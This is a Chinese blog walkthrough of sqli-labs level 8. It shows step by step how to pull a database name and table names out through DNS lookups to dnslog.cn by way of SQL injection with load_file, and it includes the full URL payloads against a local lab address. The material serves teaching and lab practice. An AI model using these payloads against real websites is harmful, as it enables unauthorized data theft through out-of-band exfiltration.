dnslog带出——sqli-labs第8关
时间:2022-07-23
本文章向大家介绍dnslog带出——sqli-labs第8关,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
进入关卡
另外打开一个新的页面,进入dnslog.cn
点击Get SubDomain
,得到一个随机分配的子域名。
(每次点击都会重新生成一个随机的子域名,所以避免误点)
库名
回到第8关,在URL里输入payload,刷新一下
http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\",database(),".uifm3e.dnslog.cn\xxx.txt"))--+
"\\"
四个不能少
注意.uifm3e.dnslog.cn
是你的子域名,前面要加个.
。
后面的\xxx.txt
,\
是必须的,xxx.txt
这部分随便是什么内容,不能为空。
然后在dnslog.cn里面点击Refresh Record
,库名信息就会出现了
表名
http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".uifm3e.dnslog.cn\xsy.txt"))--+
查找列名等其他信息的payload可以参考前面几关,就不在这里多说了
…………………………
要注意,在dnslog.cn上只适合联系靶场,你所查找的信息该网站肯定会有记录的。 不过可以自己搭一个DNSlog平台 https://github.com/bugscanteam/dnslog/
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Android利用RecyclerView实现列表倒计时效果
- 【Flutter Unit 重大更新 1 】超好用的组件收藏夹上线
- android特卖列表倒计时卡顿问题的解决方法
- dotnet 多线程禁止同时调用相同的方法 禁止方法重入调用 双检锁的设计
- android实现倒计时功能(开始、暂停、0秒结束)
- 【-Flutter/Dart 语法补遗-】 sync* 和 async* 、yield 和yield* 、async 和 await
- android实现条目倒计时功能
- Android实现简单手电筒功能
- k8s安装自动证书签发cert-manager letsencrypt
- Android仿Keep运动休息倒计时圆形控件
- android通过led实现手电筒功能
- Android 7.0 手电筒控制实现
- 【STM32H7】第13章 RL-TCPnet V7.X之创建多个TCP客户端
- Android倒计时的开始与停止 剩余时分秒的展示
- 由LFI引起的Zimbra邮件管理系统0day